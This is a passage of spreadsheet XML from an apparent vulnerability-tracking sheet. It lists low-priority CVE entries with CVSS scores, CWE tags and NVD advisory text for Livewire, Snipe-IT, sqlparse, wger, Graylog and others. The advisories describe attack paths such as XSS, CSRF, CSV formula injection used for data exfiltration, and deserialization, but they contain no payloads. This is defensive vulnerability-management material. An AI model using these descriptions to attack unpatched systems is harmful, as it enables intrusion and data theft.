      </c>
      <c r="F1049" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1049" s="5" t="inlineStr"/>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr"/>
      <c r="L1049" s="5" t="inlineStr"/>
      <c r="M1049" s="5" t="inlineStr"/>
      <c r="N1049" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1049" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1049" s="5" t="inlineStr"/>
      <c r="Q1049" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-79</t>
        </is>
      </c>
      <c r="R1049" s="5" t="inlineStr">
        <is>
          <t>Livewire is a full-stack framework for Laravel. From 3.0.0-beta.1 until 3.8.3 and 4.3.4, the dot-notated query-string parser in js/plugins/history/index.js, including fromQueryString() and insertDotNotatedValueIntoData(), accepts the __proto__, constructor, and prototype path segments and creates inherited objects. Client-side state handlers then access effects.html, effects.js, effects.xjs, and effects.scripts without Object.prototype.hasOwnProperty.call(), allowing inherited attacker-controlled state to be treated as trusted effects. An unauthenticated attacker can craft a URL that, when opened by a user, executes arbitrary JavaScript in the affected application's origin. Exploitation requires user interaction and does not bypass server-side authorization or grant privileges beyond the affected user. This issue is fixed in versions 3.8.3 and 4.3.4.</t>
        </is>
      </c>
      <c r="S1049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81887</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82911</t>
        </is>
      </c>
      <c r="D1050" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1050" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1050" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1050" s="5" t="inlineStr"/>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr"/>
      <c r="L1050" s="5" t="inlineStr"/>
      <c r="M1050" s="5" t="inlineStr"/>
      <c r="N1050" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1050" s="5" t="inlineStr"/>
      <c r="Q1050" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1050" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) in the OrderConfirmController at GET /order/confirm/{order_number} in Roskus Prospero Flow CRM before 5.15.11 allows an unauthenticated attacker to confirm any order on behalf of an authenticated user by directing them to a crafted page. Laravel's VerifyCsrfToken middleware enforces CSRF tokens only on POST, PUT, PATCH, and DELETE requests; the Route::get declaration leaves this state-changing action unprotected. Session cookies configured with SameSite=Lax are automatically included in top-level cross-site navigation, so a single link click triggers OrderConfirmController::confirm() and transitions the target order from pending to confirmed without user authorization. Because order numbers are sequential integers, an attacker can enumerate and confirm all existing orders in a single automated sweep.</t>
        </is>
      </c>
      <c r="S1050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82911</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84305</t>
        </is>
      </c>
      <c r="D1051" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1051" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1051" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1051" s="5" t="inlineStr"/>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr"/>
      <c r="L1051" s="5" t="inlineStr"/>
      <c r="M1051" s="5" t="inlineStr"/>
      <c r="N1051" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1051" s="5" t="inlineStr"/>
      <c r="Q1051" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R1051" s="5" t="inlineStr">
        <is>
          <t>sqlparse is a non-validating SQL parser module for Python. Prior to 0.6.0, sqlparse.format(sql, reindent=True) and sqlformat --reindent route attacker-controlled parenthesized tuple lists through ReindentFilter._get_offset() in sqlparse/filters/reindent.py, where _flatten_up_to_token() repeatedly rebuilds and joins the statement prefix. Thousands of offset calculations walk an expanding token tree, producing quadratic CPU consumption for inputs that remain below MAX_GROUPING_TOKENS and causing request delays, reduced throughput, or worker starvation. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="S1051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84305</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84967</t>
        </is>
      </c>
      <c r="D1052" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1052" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1052" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1052" s="5" t="inlineStr"/>
      <c r="J1052" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1052" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1052" s="5" t="inlineStr"/>
      <c r="M1052" s="5" t="inlineStr"/>
      <c r="N1052" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1052" s="5" t="inlineStr"/>
      <c r="Q1052" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R1052" s="5" t="inlineStr">
        <is>
          <t>A component of the MongoDB extension for Visual Studio Code does not neutralize special characters in a connection string before that value is placed into a command line the extension composes for an integrated terminal. An unauthenticated remote unauthorized-user who persuades a developer to accept a user-supplied connection target, and then to open the extension's shell feature, can place characters of the unauthorized-user’s choosing into that command line. No privileges on the developer's machine are required, but several user actions are. The confirmation the developer sees does not display the supplied text.</t>
        </is>
      </c>
      <c r="S1052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84967</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86256</t>
        </is>
      </c>
      <c r="D1053" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1053" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1053" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1053" s="5" t="inlineStr"/>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr"/>
      <c r="L1053" s="5" t="inlineStr"/>
      <c r="M1053" s="5" t="inlineStr"/>
      <c r="N1053" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1053" s="5" t="inlineStr"/>
      <c r="Q1053" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1053" s="5" t="inlineStr">
        <is>
          <t>wger before 2.6 (affected versions &lt;= 2.5.0) contains an open redirect vulnerability in the trainer_login view (wger/core/views/user.py). After a trainer enters impersonation mode, the view redirects to the user-supplied 'next' GET parameter via HttpResponseRedirect() without validating it with url_has_allowed_host_and_scheme(). An attacker who delivers a crafted link to an authenticated trainer can redirect the trainer's browser to an attacker-controlled domain, enabling phishing and leaking the wger URL structure (including the impersonated user's user_pk) via the Referer header.</t>
        </is>
      </c>
      <c r="S1053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86256</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86740</t>
        </is>
      </c>
      <c r="D1054" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1054" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1054" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1054" s="5" t="inlineStr"/>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1054" s="5" t="inlineStr"/>
      <c r="M1054" s="5" t="inlineStr"/>
      <c r="N1054" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1054" s="5" t="inlineStr"/>
      <c r="Q1054" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="R1054" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to check the return value of Storage::delete() in UploadedFilesController::destroy() and Api\\UploadedFilesController::destroy(), allowing deletion requests to report success while files remain on disk. Administrators performing attachment deletions receive success responses and see files hidden from listings, but the physical files persist on disk and remain accessible to anyone with filesystem or backup access.</t>
        </is>
      </c>
      <c r="S1054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86740</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86742</t>
        </is>
      </c>
      <c r="D1055" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1055" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1055" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1055" s="5" t="inlineStr"/>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1055" s="5" t="inlineStr"/>
      <c r="M1055" s="5" t="inlineStr"/>
      <c r="N1055" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1055" s="5" t="inlineStr"/>
      <c r="Q1055" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="R1055" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT through 8.6.3 does not neutralize formula elements in the "unaccepted assets" acceptance report CSV export. ReportsController::postAssetAcceptanceReport builds the CSV by hand (stripping commas and joining rows manually) and, unlike the six sibling exports in the same controller, never applies League\Csv\EscapeFormula or honors the config('app.escape_formulas') setting. An authenticated low-privilege user with ordinary create/edit rights on any record whose free-text fields appear in the report (asset name/tag, company name, category, model, or assignee display name) can set such a field to a value beginning with =, +, -, @, tab, or CR. When a user with reports.view privileges requests the export (POST /reports/unaccepted_assets) for a pending checkout acceptance referencing the poisoned record and opens the resulting CSV in Excel, LibreOffice Calc, or Google Sheets, the injected content is evaluated as a formula in the downloader's spreadsheet context, enabling data exfiltration (e.g., HYPERLINK/WEBSERVICE) or, on legacy Windows Excel configurations, DDE command execution. Fixed in 8.7.0.</t>
        </is>
      </c>
      <c r="S1055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86742</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86745</t>
        </is>
      </c>
      <c r="D1056" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1056" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1056" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1056" s="5" t="inlineStr"/>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1056" s="5" t="inlineStr"/>
      <c r="M1056" s="5" t="inlineStr"/>
      <c r="N1056" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1056" s="5" t="inlineStr"/>
      <c r="Q1056" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="R1056" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset management application. In Snipe-IT master-branch builds after 8.6.3 (the code was never included in a tagged release), SettingsController::downloadLocationScopingReport streams the FMCS location-scoping mismatch report (GET /admin/settings/location-scoping-report.csv) through a bare fputcsv() call without applying League\Csv\EscapeFormula, unlike the other CSV exports which honor config('app.escape_formulas'). An authenticated user with ordinary create/edit rights can place a spreadsheet formula in free-text fields that appear in the report (item name, asset tag, serial, item or location company name, location name) and arrange for the record to be FMCS-mismatched so it is included in the export. When a superuser downloads the report and opens it in Excel, LibreOffice Calc, or Google Sheets with formula evaluation enabled and external-content warnings dismissed or disabled, cells beginning with =, +, -, @, tab, or CR are executed in the victim's spreadsheet context, enabling data exfiltration (e.g., HYPERLINK/WEBSERVICE) or, on Windows Excel, legacy DDE command execution. This issue is fixed in version 8.7.0.</t>
        </is>
      </c>
      <c r="S1056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86745</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86763</t>
        </is>
      </c>
      <c r="D1057" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1057" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1057" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1057" s="5" t="inlineStr"/>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1057" s="5" t="inlineStr"/>
      <c r="M1057" s="5" t="inlineStr"/>
      <c r="N1057" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1057" s="5" t="inlineStr"/>
      <c r="Q1057" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1057" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &gt;= 7.0.12 and &lt;= 8.6.3 contain an authorization bypass in the Livewire importer component (App\Livewire\Importer, mounted at the imports.index route). The component only checked the broad 'import' ability at mount time, while its files() and activeFile() computed properties queried the imports table with no owner or company scope. As a result, any authenticated non-superuser holding the import permission could view every Import record on the instance (original filename, file_path, filesize, import_type and creation timestamp) and could invoke the selectFile($id) Livewire action with any auto-incrementing Import ID to load another user's record, exposing its stored preview data (header_row column headers and first_row, the first data row of the CSV). Because import CSVs commonly contain personal data, asset serial numbers and license keys, this discloses sensitive information; in Full Multiple Companies Support (FMCS) deployments the disclosure also crosses company/tenant boundaries. Impact is limited to preview data rather than the full CSV file, and superusers were unaffected. Fixed in version 8.7.0, which scopes non-superuser reads to imports owned by the caller.</t>
        </is>
      </c>
      <c r="S1057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86763</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86772</t>
        </is>
      </c>
      <c r="D1058" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1058" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1058" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1058" s="5" t="inlineStr"/>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1058" s="5" t="inlineStr"/>
      <c r="M1058" s="5" t="inlineStr"/>
      <c r="N1058" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1058" s="5" t="inlineStr"/>
      <c r="Q1058" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1058" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a stored cross-site scripting vulnerability in DepartmentPresenter::formattedNameLink() where department names are rendered unescaped in the fallback branch for users without departments.view permission. Users with departments.edit permission can inject malicious scripts into department names that execute in the browsers of all department members when they load their My Assets page.</t>
        </is>
      </c>
      <c r="S1058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86772</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87083</t>
        </is>
      </c>
      <c r="D1059" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1059" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1059" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1059" s="5" t="inlineStr"/>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr"/>
      <c r="L1059" s="5" t="inlineStr"/>
      <c r="M1059" s="5" t="inlineStr"/>
      <c r="N1059" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1059" s="5" t="inlineStr"/>
      <c r="Q1059" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="R1059" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in tile-ai tilelang up to 0.1.14. This impacts the function KernelCache._load_kernel_from_disk of the file tilelang/cache/kernel_cache.py of the component Kernel Cache. Executing a manipulation can lead to deserialization. The attack may be performed from remote. This patch is called 11ec2397fe942e8b422d026af4a03d6e0a55ae6c. Applying a patch is advised to resolve this issue. Based on the release information, the fix has not been included in any official release yet.</t>
        </is>
      </c>
      <c r="S1059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87083</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55067</t>
        </is>
      </c>
      <c r="D1060" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1060" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1060" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1060" s="5" t="inlineStr"/>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr"/>
      <c r="L1060" s="5" t="inlineStr"/>
      <c r="M1060" s="5" t="inlineStr"/>
      <c r="N1060" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1060" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1060" s="5" t="inlineStr"/>
      <c r="Q1060" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1060" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. Prior to 2.4.0, POST /api/v1/projects/{project}/views/{view}/buckets/{bucket} allows the request body project_view_id value to be mass assigned by Bucket.Update in pkg/models/kanban.go. The permission check validates that the bucket currently belongs to the URL project and view but does not validate the body selected destination view, allowing any authenticated user to relocate an attacker-owned bucket into another tenant’s Kanban view. The injected bucket retains attacker-controlled content and ownership, enabling cross-tenant defacement. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="S1060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55067</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55425</t>
        </is>
      </c>
      <c r="D1061" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1061" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1061" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1061" s="5" t="inlineStr"/>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr"/>
      <c r="L1061" s="5" t="inlineStr"/>
      <c r="M1061" s="5" t="inlineStr"/>
      <c r="N1061" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1061" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1061" s="5" t="inlineStr"/>
      <c r="Q1061" s="5" t="inlineStr">
        <is>
          <t>CWE-213</t>
        </is>
      </c>
      <c r="R1061" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. From 7.1.0 until 7.1.4 and 7.2.0-alpha.2, the System Catalog entity titles endpoint in graylog2-server/src/main/java/org/graylog2/rest/resources/system/contentpacks/titles/EntityTitleServiceImpl.java allows an authenticated user to request composite display fields without verifying that every selected field is readable. A user can retrieve protected values, including the password hash on a readable user record; ordinary users are limited to their own permitted records, while administrators can retrieve hashes for all users. This issue is fixed in versions 7.1.4 and 7.2.0-alpha.2.</t>
        </is>
      </c>
      <c r="S1061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55425</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61910</t>
        </is>
      </c>
      <c r="D1062" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1062" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1062" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1062" s="5" t="inlineStr"/>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L1062" s="5" t="inlineStr"/>
      <c r="M1062" s="5" t="inlineStr"/>
      <c r="N1062" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1062" s="5" t="inlineStr"/>
      <c r="Q1062" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1062" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. Mailbox/set let a sharee change a special-use role on shared mailboxes. An authenticated user with maySetKeywords on another user's mailbox could change that mailbox's specialuse annotation. This could allow the sharee to change the shared mailbox to perform the archived, snoozed, or other role, which might cause mail mail to be written to the shared mailbox, sharing more content than intended. (This is likely to be an unusual situation, made more unusual because if the target already has an non-shared mailbox with that role, role duplication suppression will prevent the update.)</t>
        </is>
      </c>
      <c r="S1062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61910</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88001</t>
        </is>
      </c>
      <c r="D1063" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1063" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1063" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1063" s="5" t="inlineStr"/>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L1063" s="5" t="inlineStr">
        <is>
          <t>pip:open-webui</t>
        </is>
      </c>
